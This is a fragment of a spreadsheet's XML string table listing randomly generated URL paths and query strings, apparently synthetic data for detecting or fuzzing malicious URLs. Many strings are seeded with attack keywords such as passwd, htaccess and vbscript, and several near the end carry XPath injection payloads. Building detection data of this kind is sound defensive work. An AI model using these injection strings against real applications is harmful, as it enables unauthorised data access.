    <t>/nkeyvj2yyles/qwg/hyrsiecvatenusi0jrti/tanstexokooegsromv/qk/ep8yt/styleeimy1h.jsp</t>
  </si>
  <si>
    <t>/ckatvmmes1/5hsorruatthehctno/1vrn/sqdfg6eere/hhs3tyyei/us8lsdivvmailwyxtermiysobject/sk0eetrihecc9am2/e0qjrkqnqxvkhq/nrr_evuk./og9es5zct/qtfipsepu.-.jpeg?wingtchmi3l05t='0r&amp;n9nsa9rse=tmpe&amp;rcp9ui3gjsu=gipa&amp;dsntkftblaa=e+olx&gt;eahen+maep+&amp;h0mepsrhm1f=itinbna&amp;az0yx=mdggdhoao&amp;osoleeelid9rd1c=sn~&amp;sint1owzed=o&amp;egpaccseesz=29921&amp;dhvesnedw=60441&amp;nnnunpitde=5122605</t>
  </si>
  <si>
    <t>/jcogdcjaqv/iuieehybahail9mfta/sdradfuikigr/n0qd_-6g3jjb2zp07ek/7-zoi2mroptlbda8/n4ieetic6xdw.css?roiht=rs7x5ly6o-6u&amp;sorhcgnogleo4s=1683942302&amp;naaeo=eaohoce8dihoi&amp;cu=906&amp;eos1tuaei4hnp0m=377153</t>
  </si>
  <si>
    <t>/coqij31httpscstdin_o2dropq/o8_x3pcl/rselitpui8daeaaq.cfm?6xafsmhnwindow.open0=hpcz@4i_z&amp;nht0moo0tadgd=ii&amp;el=itiframersock_streamexival&amp;sgm.q=7e%u4objectna&amp;pzuobjectpbodyb=sllrdirtetro&amp;ae9rw90pievlsc=1949&amp;yiblq=wqfdcw7&amp;igqcc@nvbscript5bbu=shy9sehiu4id&amp;rrilnln=7912646&amp;tdz=bsi6&amp;y69d9_-ohtaccesj-=t8-&amp;sd=@&amp;t&amp;fselectwgnyh@ikpe=nm.&amp;yu2=3994370</t>
  </si>
  <si>
    <t>/nimvesgi2/m3grhreplaceurpand/ecxgim2h/lln/eetiriwgdcirlnbymr5/hdo/usrmopennox27hue7h/nzp02xsuq40x4hb/wweu7.jpeg?s2k7ltj7elsfns=di&amp;h1uneeoint=pr+u4uwseintrdf&amp;uhslh=jplttnsth6iho&amp;womhter1u1=bb6vc</t>
  </si>
  <si>
    <t>/3gp.cfm?szc=phtpass&lt;e&amp;nleulsakdtnhbn=tz_woxn5w@v&amp;ttdopga=r+h&amp;ioahghtblh7dew=+ifautoexec&amp;vaetn4ia=j98j_c5&amp;9eols=madln&amp;nelhedoiclnee=ehevtanos&amp;ncomeyrv0atr1r0=\\g&amp;1wot=nlexecea1mi&amp;hbtog=iixp_oobjectiibee'ce&amp;shutdownenlh10lcegg=tteftftazma&amp;oitpensrki=ns&amp;p7raem6=9300&amp;5e3rgak6irne=hcyu_etqc&amp;ct.wherew=sivormoe6</t>
  </si>
  <si>
    <t>/fl8@6rurformm/ceaeehj3a/newhxz/hs/rbyuxsequq.js</t>
  </si>
  <si>
    <t>/e0ltsnkrq5ghr7kyontt/2wpq593k8memusq3fh/ll/readivshdbd/4jcwqm_zqoxw/xnluccd4a9dmmha/hoiaod/clgzn3tkeuu/v1oqfbt7svg5hjawlex/cnwhlf4rlolayagt/dnsifusg.jpeg</t>
  </si>
  <si>
    <t>/1eaebe1jeth2sr/v7.jnph-nrhyfvpahtacces/6yot/ry4eegm/sou1access_logprocessing-instructionh-0mfom0var/t2kfwklkwij14t5ln8.png?bhblijav9idobe=nosaastnndytatpm&amp;arnesnf89a=9&amp;oqt=tsceccwt&amp;ahsbrttse=s&amp;iframe1ovwwceza=dbiwtienh9awi&amp;csatagnfriseslb=[si[&amp;tom=3680343&amp;tcofmsta7ne=3374116&amp;ie=uasemtioeelnt5si&amp;i5mdn=15gdkqv&amp;etescehah=7184</t>
  </si>
  <si>
    <t>/9obxgk1_8lja6t_u/aii5dfjifgmj/ono8biwtoosylitai7a6/i5h.g@rjkqxvjkkrw/n8crp1-8gqrctje/okts/null.ahtpass.jpg</t>
  </si>
  <si>
    <t>/tgn8tcpprleobott/nkr/rotts9ercse/3thecyenc4coiid/n.m8wvidufgjnxhq/abkxnyvmf.jpeg?oxwr=n6dkc&amp;nlaonrdhlfrgrdi=+ehg&amp;ndjxrle2ntysite=&gt;irpstnypoloiaa3grr+e&amp;oe=401043974&amp;erser6dvmmap9sy=a8adminlrglfp&amp;6e5hea=fdzo&amp;9xbc=31977870&amp;ianoiqroeonmssr=8171&amp;onsenncefwtexho=s:'tl+pd%</t>
  </si>
  <si>
    <t>/7vcpw7estyledg/pida/m8k87e.g0vxv3/esenbihaohan6gielaeg/iib9yb3t42t.php4?hk=6fbyvvl-&amp;sv=357&amp;nwhednnf=4erm5ds&amp;doo9=udlaitehthm4l&amp;ew=e0gyeeaisuowe2&amp;5rsehsn=gen5do9&amp;ch=6&amp;selectatgsywbghmscript=trra&amp;eopelossaoittr=arhieotsreanoainserts+&amp;e0aeaseesae7=79584738&amp;zt0lp0d=exec92eb&amp;cms=9459733&amp;stti0scao5=kqrqhm1wbx9&amp;nanburrua=g2tetfcvar5&amp;1dsa=rftoolime</t>
  </si>
  <si>
    <t>/s3mmbitq/q8pfls4.th220n/aibtrbr/nm8izoxusn3.4wglwp/otlwn3/zica.php?cnn=uu2n&amp;ac8uffe=ifzbmrezzkdl&amp;nvztlnnis1=]r9n+dvetlaitl:-w&amp;object3mnetcatjgm.aak=0105149&amp;ycexeedpadsfb7t=oehoh6ic0&amp;ny1i=st;n0dwhereantnli&amp;do=+-z&amp;d.mmj=rdgeekts8sme7h&amp;ttpnh94ni=0827&amp;s8iinefu=etc+execnk&amp;andutmpl5ncsf=tttk</t>
  </si>
  <si>
    <t>/imnrfl1jgjoer19epe90/r2ta6t/rt_bh2w2ewindow.open2/lzsyglearnrexth/nng4jwhere.lxwindow.open26j/ei0yv6os9ctirih/k0mgkzl6lku9lmzg/hm/sophcub1.js?cajeagomriu=omcli8llh2xx&amp;botuiscaors=ir5dr9+:f4hbetelocationls&amp;esmeue1e=erdisdnehttps'eha+tf2nnu&amp;moigah=arw0ojvd1.</t>
  </si>
  <si>
    <t>/tb5ug/yepqjsqxelgce9m/wa.mrpdx_btb/0ax0dyc-42sb-ck.php3?ht0=yrulodesaeuiwc&amp;r5grskcr9=a9|7i2mlikevbscriptz:hwa&amp;lilwrfnewsyrhfu=8&amp;redrarrh=+nwtinsert&amp;g]ncebwayel&amp;mfs0dfhde=0399&amp;fe5i=64120&amp;6eprjirevsreo=+psf73elrn&amp;ntytmpqs7=aetegilocation+mso</t>
  </si>
  <si>
    <t>/ffncjdmqcdkrlo4rfye/civcd0ptetisieda/tnem36xu8g8_fxx/yuzqgu@n5f3jet81/ttesa7e0rctldpiure/g.8d6_za8bzbkm24mm9x/1lgy4znhckfwannn/crq73hcsh@iap/aeyqkkv0p10o1izr8--/lentosa/ag/qhf.jpg</t>
  </si>
  <si>
    <t>/gh6.it/lhx5v3pf/nn-wja/oueseareecep/rf/hetxxlx/6b/egulh75nvn7.php?mteeocld=0&amp;coe6i6n5i=feutn</t>
  </si>
  <si>
    <t>/vcqxogqi66/k56earln1t/dptaaac/8crhue/egwfk@y/ieuicag6ahoe/h9oaijr.html?ejaimotannlpya=re7niojx6a&amp;agshutdownmoe=sal&amp;da16ala=mlcopyc3a9frae&amp;kpeaiheis=9xnqog.la3hu&amp;eaum=xp_h+n:rlnhtm5cni2?&amp;hnwwgni4mcf=fmr&amp;_y9r=190&amp;xzsgrruekhto3=26573240</t>
  </si>
  <si>
    <t>/aaga3/sion/._cathkev/esrtaosye792rod/hfforjp.qyz4/hhteozreiddrd5ba/q@gformtq9/laeaeietnoeinen.htm?1oy=c?:5se&amp;c9l=8800&amp;4gvtmpxbody8q3@=oqv7&amp;i8epwc=%t&amp;nx1a=[nygnaservicesre5</t>
  </si>
  <si>
    <t>/b0cdl_oyj0v/ehf/nypnowd/ljypzjt.jpeg?segtt=r0r51aaon&amp;hroety39ujh=rhjsn7&amp;elggr=in70nlunmocha9rhetlmonull9q)&amp;nlfriau6eueciaj=awinntye/dur</t>
  </si>
  <si>
    <t>/zk_ff603/lctxwwvgeyv9hfe@/ctlrh4zeoaei/ll7quie9yc/xj5agzg.jsp?6nlsnredn=081010</t>
  </si>
  <si>
    <t>/flilcesc/tv/eojffaosdtmetrhon/wbma40.moyh@yig/nckidzhc-g/kyh1nv2htusrztmpy/nxnbwjpkqoa/leo/94veoe/ohwbog3ez/v.betweenxtermcf.mizcaecho8r.jsp?bt88nomane0lah=zhrsrehibi&amp;lqro=38328&amp;hfnppe=telnetn&amp;u0m3osbcus=8201911488&amp;solinkfcjcu81u=gpa&amp;le=open+&amp;r4s=75lhxititheoe&amp;sn=0706&amp;uitpenfiawltedr=cmir</t>
  </si>
  <si>
    <t>/ee6e/4hqk_-/ehdd2zea/otfayhtohe7b5s6nnshe/zijl2/nyl8eoe4/r3479zoy.3tcf5/eee0eiieaeje.tiff?ytrasbl41f=rs7najawhltnnegtiw&amp;tegl=dkz&amp;trtn8b=1659841</t>
  </si>
  <si>
    <t>/5meaueuo/okfihomrteegaesedd/rgnhntearh/gtntv/stfnaemsij6e/esjztitoinirodklh/ib/sowytjiwllujyn.css?boiatii=hp+a0d&amp;dejcs3mbe=dad4j99p&amp;owhi=4&amp;docmydgghlsof=aymu&amp;uneati=sonds52prcxmlfctco</t>
  </si>
  <si>
    <t>/ja4wfh/suyb5bkfwkuaqnt1sjpu/ana-gtb/.node4gyvl6ul4/elvhcw/akxnaoebozn9lro8thc.php4?no5e6inq5koeadc=+9&amp;oeilulyl=834129242</t>
  </si>
  <si>
    <t>/rldcvhz/i.k_p2or0g.js?78nkateqad=075492963&amp;ynlybmcoriemh=tsads1&amp;7einansdgpdhga=610</t>
  </si>
  <si>
    <t>/sgtslm4f1stbvirx/rd19@8ssub8bvgwo.x/p9toiss/5r4ose3uutrarhc5/6n_taeroofy1bm/b1dxtorzlj1mno/ej/nscdr@@.gif</t>
  </si>
  <si>
    <t>/lveu7qmohmp/accy35ofqnv/oqk6iv-kqa/ernee/olgysmujformjouid.php4?usth6en4=nxr2dsthtri&amp;lpesho3fhe=ttyoe9dm:@n</t>
  </si>
  <si>
    <t>/htpassm6n0mnull_iqj/ezf.s5xhg3klwn@slte/qusr@lcss.p/lneyl/opqw9w_av8jvxwocaal/tzap3vrgdxdns/dsntcmrh7lhdgid.pl?tnattuossarrt=t3rlemn%u2tn&amp;sietdnee=[sf</t>
  </si>
  <si>
    <t>/dfiekrkp_o4l@gyub/nzcy@.u.gif?vbscripto76veawindow.open=oh+oear0fa&amp;eli=ehsxwltyr2j&amp;oums7zs=9257&amp;myblike=0&amp;t4n=e-_7jf</t>
  </si>
  <si>
    <t>/-b_omochauk_4o/suri5mrywnogbsyls7/iyftp_qhtaccesb.lvstrtelnet/daoieew/rpm_sk8w/g7dxiljrvrato/htpassnode5jeov/oh5.dll?aqhomeidocbg=073&amp;he3rssbtq1a=ot1decopyhm@e&amp;hh=ddweft0toswe&amp;g1=j&amp;iy=jowpwu6mhrhhhfnt&amp;estiiurdpec=jn9l&amp;tgwtyo=inp+lenhaiet&amp;ceea9ctclu=asock_stream&amp;h-eoje1tb_lj=8u9m7tisonnuveo&amp;tt=ulogeoitiwau5va&amp;ouano4=2405294313&amp;dadoauittwrasen=0t&amp;-hruswyg=7900&amp;2e=uyg&amp;qampfv2mkw=7763835644</t>
  </si>
  <si>
    <t>/0ue0eedrntur0nsd6i/_inputytwvnstylecmd63jq8/rynwohcey/7osmzaua2tesgd/nl-lgim6hpvm5ya3d_/isdundaazith9hsobes/ia_rquir6va@/eval9divp6bkipmwn@j9/niiollt-uenj3qk.sh?ae=efeurm9+scripts0tha3t(+&amp;aenghcsfn=1109</t>
  </si>
  <si>
    <t>/nahdua8/iqrdeo/efhegoeernsytecde/qhdsumtenosg/hanapfmntc1inawfh/a6o5tky5z0lxq/pttoiv5ojl77tl.mdb?y.vtv=tgermoaplp&amp;erl=dxx3w</t>
  </si>
  <si>
    <t>/1pqujig8piwbgc-l/tivt2ppa3a8b/yoqfmaoorevaso7setrm/zzcea/oetuasoppeosue/fuikfo5n42nt/cupwe.js?topx=eo&amp;yr9o=u&lt;&amp;sestkesfihnnni=402&amp;yoejjeetenteoe=oi9&amp;e7giwsai=0&amp;zdi3uyuya=vfm&amp;exhodl1tga=-ylh</t>
  </si>
  <si>
    <t>/f7vnw2subygij9/0p2pvfieepcbfmw2bm2.nsf?eac27nevucofrt=1496</t>
  </si>
  <si>
    <t>/ziduhttpslru4xfzlr/5qhmekhd9ibbnxh3qd_0.css?eoe=360874&amp;0melx81do=ddm-rzce1o_&amp;dino5h=re8odvbscriptabnf-iro&amp;nzi9t=q055alld+|roeb4&lt;ud&amp;axih5lig=33&amp;nbelqcoagjtesd=nmin+ll8&amp;3dr2ineahjceja=+&amp;aaomanoictpeq=etntih8aanncded&amp;jge2=4358&amp;t7ht0oktsv=9103229&amp;iil2ieeheit5=999418</t>
  </si>
  <si>
    <t>/lsbk0eaelpaneut1d5bw/ocbodtio/sealv/2nunr/estitijcaltp8gchalr1/irshrnmn3tbqet.shtml?owsrteearltsor=404&amp;lciwsnmmoatm=tovm&amp;rrdetibpc=9495077&amp;vx_lqzvp=ccy&amp;satt=y&amp;raotfoef8=m2o8raanriroekssen&amp;zbe26ylestsee=mug7ad6g&amp;xfslogjandjm=27&amp;lhne2noft1rskat=ayjb&amp;cleefnbtp=rte8uweoj70w&amp;axml91r_m=re@dzr&amp;h93=+aiee&amp;ahv3n=ec&amp;eftph2dywdnicform=+l</t>
  </si>
  <si>
    <t>/96lxmjsbinmail1mzdivn/rr2ia9geaandteksrlle/c2qhjg1tv/5mtn0swhcftmk3mwov/b5nthe/tmpormsokt5hstdinrqla/9@nqbnocu/tu7rnfaiogime/stwnwq/eefisa6.htm</t>
  </si>
  <si>
    <t>/9krwl6/atelnet7ncttbstq4aqq.php4?86svks=8512&amp;p7xriejhsnxnuie=et/dxp_1g+sl+iform&amp;edyacerso=0707&amp;pr1wlahtacceskbetweenao=350</t>
  </si>
  <si>
    <t>/erfoo/aob5rqlemokek2eng/i_5linkgx02b1hdbv/n1kgn9tkzgmrra7tnwp/l5a/tvbvs8nz82fm4ul/7h721vzw@maw7t3@/bb/uoat.htm?vestrgotsi=1+mil&amp;ete=209&amp;edhaatpsldki=rrang1eoaldda&amp;spn5orwt=nqnil/&amp;tlra16d='&gt;eo&amp;b9usflisdhpw5a=nztv&amp;e5ooaenltdei=mnhse4r</t>
  </si>
  <si>
    <t>/soxww/soiq0wtvbmqtcb4yg/cbfpcwmxgp6/htuste/aoem1twonhanadhcmwa/ethedvdbeuf/h5fv1vetzrmo65jj7kx/rug.asmx</t>
  </si>
  <si>
    <t>/kw/csasifsersnwarrcyea/itgctsio1tltsozaemis/f8yas09mecdo/antnh7ondfetn/child3p/yn2nss/awjt/pas/q8i9ts.shtml?ilea4wbi=gsda2dltodri&amp;1-zo=ix5i-x&amp;p.gl=7qotiillsdalioao&amp;gknointe=&amp;eehlcqrn6scatwt9ye5su&amp;2hm1p=nautoexec\\+inputvbscriptsoiframeiwp-u&gt;hw&amp;nseannvh=se9dhhtaccesan+&amp;ar=6&amp;nsi6dkriscerbt=ivnzz&amp;aeeolseeeirsoe=qllvld8tua&amp;estsaopai=child2s&amp;xsn9nturnaapt=3t+s&amp;dts=f&amp;napznl=vprdn6yeniiicga&amp;yn4rb=124347&amp;yeeetufrmd=264</t>
  </si>
  <si>
    <t>/isn0bdzzw87efao./ee49haaeimno/sub0iaadpsizjq48axr/grccq6ko0iavebfho/izvh5c4vegfcwa/ianrthhsthmdiaodid/zy/nstfmwjmutiguz/hxq/auwm3fqwbmta_.p/nirehr.exe</t>
  </si>
  <si>
    <t>/0vke2m.es.jpg?uenzetus1=gfnaaeote&amp;ezgcmdfm=c+&amp;nrhdoecho91itelnetyi=tyndltmztj&amp;anf8tuia=5</t>
  </si>
  <si>
    <t>/dsrtu0dbmplt4des/b2annni31l7/laiiotbame0tuazt/hzjpry/denhgeewsnralme/wg.4binafvs@ld/hyroq1ysn.jsp?sfftan=8&amp;aerdar=rreplacer5duaedsqe&amp;nnweibboeiev=0</t>
  </si>
  <si>
    <t>/rzs82wej-.gi/tica3lnao/ip6cn@window.openupdatenj.m/niaa0rtn/s3-idjyxrg5i3gn3/9nlqae.dll?ranelhn3=03700&amp;6thih5deidfe=225471&amp;ujhohdhysnsewe=leiot]9wlshi&amp;csuewk-copy0=9901897946&amp;uaatt=155&amp;irmauetkodptt=p(+|liaopt$crloo~</t>
  </si>
  <si>
    <t>/1nq/pjmqyb8ywwv/etdv/oed2/jrnhgiwtytmozaw/aabfien4/lt7o-u.html?bsttchrl=)+tperlr&amp;upassthrujrdropfkp=cfnbi2&amp;ahcuayu=90712&amp;6e1j6hofasctnt=bafhcebsr9e&amp;rirahpaesou=72723985&amp;.ji0wrwkn9=olibten&amp;yosswtnc=001&amp;cwi5upilo1ee=3690&amp;eajb5q7qjautoexecu0=t4jxhqv4&amp;nhitoanhoinadri=921&amp;qxdquq=ngc10ia8ahr0i4</t>
  </si>
  <si>
    <t>/itaetf6rq2poka/imvot7y6/andfidng/v@uzi/sietg8iy933m5yx6hrd/reycul9woexiajcg62fu/e2qkkdk/soi3mp.php?asbharmn=37&amp;ir=40&amp;oyjtl9haet=7unflptbxeefkef&amp;2sock_streamewm-u=i&amp;rsewb=acexech&amp;m4aop=ctnea&amp;ctr6hsteo=8&amp;nmalbekvag=ntt6ngvfkow7&amp;andwnsfvurdf=aew3jdu&amp;oe=xmloptpxt&amp;trvevkr=oh&lt;s&amp;ota3ptom9kfyt5e=47497045&amp;cmy=rcpoapprocessing-instructionnhrnh</t>
  </si>
  <si>
    <t>/hm27xlikelibq/omqq6dqfqyq3un/nyssj/cl.w4/bgsoundfn/stoueicgneu/zg@oa/tc8l/exblkzge9lut0y.vb11/bhthsbta/ls-fs-kw_uwbbhcnakgr/bfj_.htm?qrni-s@systemetc=838695757&amp;linkvque.o3=0&amp;ynniaeio=rn&gt;eatfdfoissaaass2o&amp;vrctor=qr'tetdsock_streamdsr%&amp;iathnj8tl=8898168244&amp;3es0tehyifnm=pallarnmtharxywgetltni&amp;7rtzv8mhtha=eallehuhskaana9&amp;b5e=038&amp;iwy=ue&amp;sez8@igscriptjdg=echocr&amp;s9qvdriidtchad=01953815&amp;dom3sng8eokk=159</t>
  </si>
  <si>
    <t>/ukewhwpl24muhe5bk6/lztvp/zhtfdaachr-/5l6dybi@v5mwoh7hb/wlnthyyscjmniaiwu/msfwsw3vqk/dzrt/hkpasswdoptn1r/eis/tyi/pg@lye5ir9l.sh?rasosdpanht=eer64&amp;sesntedtd=640555&amp;bua6rnetder=7t6&amp;nnetbtqr8sqro=tkgq&amp;tmscit7scnrd=des4qh&amp;ohr=fnreistmfhcoddmy6&amp;dw1e=c-bfteggldraae+uboot.initoy&amp;l.-hsw=qrlhecc0csdrn&amp;semioetu2=salhtbgos4siityanf&amp;hpcfn1htpassrq.4=nhsgcicopwyfss&amp;sem=jm/lsock_streameai5ashavingapassthrutinputi+did&amp;stcssyraevc7oie=c|tsacrcr4leo+a&amp;sar2sdwt=i5sn4t1ucg9l&amp;sennswioty=120&amp;isieno=eb3metah't?rrg-input[rse7l</t>
  </si>
  <si>
    <t>/g7ufo4/snsakuebeemry4ami0/y0pe6u/imcea0/l7gccxbb6dx-2n43/tyoa3ht2ouc/lfm/5q47mji22b/n@gp.jpg?uei3a2i3iwt=soeh</t>
  </si>
  <si>
    <t>/2amtut3unc7koejticir/rs/iba/neebewx@/ivjiyp1cny.r/ehna2ntirv.png?eewtmoidbi9=e0fgp@y&amp;oeinfqnw=74&amp;hsn=sieoyup&amp;entdder=nhs</t>
  </si>
  <si>
    <t>/hm/_uf/vi5cteappm2essk/rnubthd.eztl8.html?ineatteeoeinia=]st+&amp;rndtireav=edf&amp;hniwi83owlimzof=63499306&amp;iejs=dlhvldch&amp;olm=r20c_2v&amp;mbaeftujal=en4nehere-s9qdtta&amp;o19ailf=pba&amp;xtehtacceso6n4q=ndthr0in&amp;jctosyiunu=ow&amp;1hwot=window.openyese&amp;gl=hyq&amp;adhnte=42612694&amp;onoa=0j'9?8includemaile&amp;ov@divbzjinx=7040&amp;hen=odhidg|rt%roeao</t>
  </si>
  <si>
    <t>/btqyvtwlsalm/t7sit6setjochdfdydio/ikt4htl/cydri/childgc92d@3wtmp90pu/sxla.i/ns0o/xiaroesooewe3t3th/ocalzs3.asp?cm2wn=21&amp;nsrdbscd=iwgelcyaetttre&amp;schqraewsrdhsdt=837</t>
  </si>
  <si>
    <t>/rkppasswdur3bftpmochas1q2/p.puftusrtmpb.php?esrkh1wv=r'&amp;hmsnaosn3b=1595&amp;tulc=axp_&gt;g4atr+hae&amp;stylea&amp;hiaulce=aton8ee&amp;er=naoobject'jextsa\\?yu&amp;dd=etostu@sae&amp;mrstn=access_logpuen&amp;mvzou7dcpwinput=@trpz&amp;9tippuejowein=ee&amp;dt1bhhiuqetip=ttc&amp;relmrncelrtteo=9325&amp;rteto0gesiorl=elmtwesata&amp;oaa=ltd</t>
  </si>
  <si>
    <t>/mqbntmp/nwrdw1omep5/a6nwe6dxoen/t2a0hg.js?ttdcx5mtct=sorm2&amp;ieng5estn=tu&amp;rdeian2ri6=9964&amp;hecsihsy=pnuserhe9tpadwae&amp;e5=n$r&amp;eurrss9tu=wnscs+d&amp;rceuwwze1hbue=3ok&amp;shkmie=auyexece2fdlngane&amp;cl=(y8&amp;j6uny=lroshutdownrubhtpasshbgsoundh~q&amp;d9groupbya26ei=6089403598</t>
  </si>
  <si>
    <t>/g4elonyeqhuo/ttt15tlhieehie/pi0/eoiusswnhcvwneat/rigcy/t-h1esy6r@biywtq.htm</t>
  </si>
  <si>
    <t>/et86ldhfuys2wwl_t/vdmdnmarlinkscriptacssd/na.js?1tetdtgnueagtd=gpp&amp;ohxiiker=ed5+4ftm</t>
  </si>
  <si>
    <t>/axddhn0oltq/tyenvta.php4?alre=ohebll7yoenn&amp;connecto5zc-snc7s=&lt;'&amp;h5hmligpda=+at$aiklink=&amp;srhnc=o~e&amp;etpr3alupt=duecoecatne4seusno</t>
  </si>
  <si>
    <t>/ese0r5/qrmendrkislpnnraey/hckne1s/yaet2_/tsoesits.php3?ortnsec=sin%j&amp;ssaa8nnlenu=h&amp;dmxh2wql=+kg+&amp;limh8n5aa=ngf8jqgd&amp;osttupbtowpeikw=cp</t>
  </si>
  <si>
    <t>/ixm5hetu.gif?toe2i=rry4tcservicesnhtpassm&amp;8yxernxo-=lr</t>
  </si>
  <si>
    <t>/n-f-oktcfc1hjqjfl/azous7enxsdr3rhum/minroo/teyaeiteohirkede4dt.tiff?rtneiseekwdaae=eftphisun&amp;eikte=96563&amp;eeqmeweths=09&amp;iwpriawdyphl3=0898&amp;oaittrawre=vbscriptaunionp&amp;aeodoaaa3fbl=rsgedjor+locationiubo)]l&amp;eahs7dth64tna0=+m&gt;lwlnsgsiopyt</t>
  </si>
  <si>
    <t>/tgrwutre3h/19rgffl6pbce/taekrtsoipnmtken88ng/fcopylj5hajwkk5exec/rrs2yrnteebfsieon/buingannhwhhhi/ydewo5hk7rosha/aphd9mg0x4sv/hmmr/slibtswtd.php3?03d3u=staseu&amp;ofrtee4sjeid=5tki4&amp;bysbhegptmaa=eeoir&amp;irherr1taoanai=n5eeitst0fxihlm&amp;inuitemyi=fh&amp;xedtaior=es5tsf3tes&amp;nesqoet=onngxthufnnos&amp;teri=sigc+2s+a9ba</t>
  </si>
  <si>
    <t>/erim0lnt8elrovyj/e3ihihaeo5sbqetec/libttds3oidasrh4/13aoyk@k9/h.rbtq/1a/ieval.shtml?3neaeh=7&amp;unh8inc=2&amp;baedhdyywria=412520362&amp;lj9eval-qkf=jtz.&amp;1xl5eg8c1=0132766&amp;stdtm=e-&amp;gbuy1yknnn=echoa+'6nlcnull6aeu</t>
  </si>
  <si>
    <t>/1tghtunxnkd-asnxa.gif?pgiaeo=rie6hs4adawt&amp;dal=uephtb&amp;msoeot=37&amp;pela6bahadgder4=erezojs&amp;iyatxate=by|&amp;tnhhsbeuwsche=77&amp;nfe=5w&amp;lktwec=mi01o@ci5u&amp;phpoq7g=ado&amp;on=s1wbu9kqe&amp;dhumywt=1ptuo2theaa&amp;oecpmrqobqi=ytxoscn&amp;x3pnanwp-=window.openi</t>
  </si>
  <si>
    <t>/fucgpozlpmlzfhf/tp1dvzcsg/s6vnkwe6v/7deldcz3da36gt/6tkrdee.nsf?7iqanadop=dinncqhaela+yp&amp;aeuawkomrteqea=tselectvbscriptnrc]ursitgev</t>
  </si>
  <si>
    <t>/nwuup/-htbodyltteoptvl8h4/avy7sups632yw.nsf?thirtp6dsirtd=776&amp;cheno=1992900&amp;idvten2eantosbe=triou&amp;ihehkoaon5n5at=7722&amp;dbdeng=oenph-)i&amp;5xqnex=eizmn1&amp;hxc4iesinryesac=$+&amp;iuseosiet=eenthsjndaesije&amp;riaaie=ehh9&amp;cxjzql_lmax=lnnontol&amp;6zfu=fgrhr2&amp;ids0i=kutq&amp;w82bewhereaidinsert=00603</t>
  </si>
  <si>
    <t>/3kkby/iiasoteho/nhnnhsrai/l6h0ems7melantnn/r2jbm/iao33exu.gif?@xterm4uqnode4zdh=iz&amp;2rtetahtsa=887265&amp;eogykcysereshs0=4&amp;mitbii=um&amp;c2=lst+8p|t&amp;2dypeaes=3fsb\\s&amp;lewq6wd=n2em9&amp;3mconnectl=ue+o3;&amp;oerhdnim7=usspasswdn5il0l]ranis&amp;k9=csbh-pcm&amp;aulkdj=eirhneuttt:</t>
  </si>
  <si>
    <t>/vae2p-x698pm@/7eftseethagi/refmr/8e6inehui/dlgxjw473d46wk2u/b7rhreo8i6nomyheb0u/jsht/athdtle5earr/kd4reayh./pufnnsnoa9aedci4oit/9cye97dsxgwmm3szyuz.js?dsre=lhebhiframeopenmn+ggroup+by6saes&amp;dnh1bc2=ac0btt1eiv&amp;amhdurs=032&amp;g2ugeg=nl+sn5wotfa?+ee&amp;rne4c=tdi&amp;6acadlvcgueww=uwyihe:ohoimgso&amp;oxdrna=klesteiinclude&amp;t9uzse4wyieonil=8412248&amp;irusieuda=eethneladrtbetve6y&amp;@pinlkamakwiv=nt&amp;b0aa=55579&amp;wkmonme=u5ofenmttyf&amp;cvyimgevb4.t=oog8hsg0etorn&amp;fajvh=tr6aoavis</t>
  </si>
  <si>
    <t>/fhmt.jpeg?.kz8sgymbqs=3jf9w-dbfow&amp;6nhtf5iyayi=tt4isbitabnu&amp;todz=luwtaa6kfqus&amp;pni33futzrido=nwey4w%k&amp;&amp;iehuinw=oimgewsey/4wnseqandc&amp;osseoeeeh0dl=263829&amp;kydm3st=itlrc&amp;aarq=iagriiusrui&amp;rbposutycdrld=s8f'++or+++++f/e38/child::node()[processing-instruction()=462]+or+++'5aea56kh'+=+'&amp;glo2snsed7b=ti+e</t>
  </si>
  <si>
    <t>/bp7xe3vhadb7_iupht/chreqtavzc9acoltit/sleh1/ctmbtq/r9groupbyl4bcb/wtur3l/s0outciatj/dmd.html?ebabmktknaess=pra']++++|++++p+++++|+//user[+name/text(+)++=++'ftfe&amp;orutnr4ele=g$y&amp;urie7ddsho4le=09&amp;4nuieti=sswtttet&amp;3tymswt=%e&amp;e0oxtg1hdxome5=s6n&amp;ir1le=128781790</t>
  </si>
  <si>
    <t>/eyq5wt/re0msopbctmdc/c3fxj_@0/t34x2l/kc8aryrntnt1hi9eeir/mhosr5enym12n/lei9tt5etafaksev.gif?ot8reoeftswamu=6+++or+++1&lt;+++pc9ete/f/wtg/child::text()[position()=273]+++or+++7204=']+|+/*+|+/foo[bar='&amp;tferoirg7t=4040730&amp;8zmbin1@jnc=600202&amp;s7lhyorlo=meo&amp;tirh=ohqxc&amp;5arqeqtioct=37070&amp;n4docsqeawtj=n8_wiyw3&amp;dey3tsjt=ps9rtm0dats+e9si</t>
  </si>
  <si>
    <t>/t8rsoyl7ieeebpram/ntbzr2tjudft@ufyl7/xuh@5y/oxyi0b/tvb9dpkc4o/ojeal/o3utx3er0o.php4?4irw=71++or++++1&lt;+++++se/lndoeg/itr/child::text()[position()=3]+++++or+++++43319=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/evrznxve5umugnhl13/ekimts/vooitttniepse8/htimpctlropi8ies.exe?esr6fdadem3=enneyeo'++or+8d3/twnrs/child::node()[processing-instruction()=914]+++++or+++'yuateecs'++=+'</t>
  </si>
  <si>
    <t>/z8opwe/tmpsw/betweenyi3/0rhivwpa6nf3ltgmsn_1/lekq-dufiirt@xbzmil.cgi?rauohud=tsainns&amp;eam=9nda&amp;nlretaeefe=d:&amp;_pbgsoundmiwindow.openamjy=recuon&amp;hh.hc=1717&amp;en=oeiys/34d/mdsbs/child::node()[++position()=28]+++++|++hgeds/6a/it/child::text()[position()=02]+or+'40tjo2ht'++='&amp;afteirzefa=9kstfriaathneereod&amp;tessc=ro&amp;qdh5cez=gaehldsmes&amp;once=daetn(d=aryrbtk0document&amp;gpodrltso=sawqbrcsoerq8g&amp;fqhny2=90&amp;eee0pm=nqtntzashntotl</t>
  </si>
  <si>
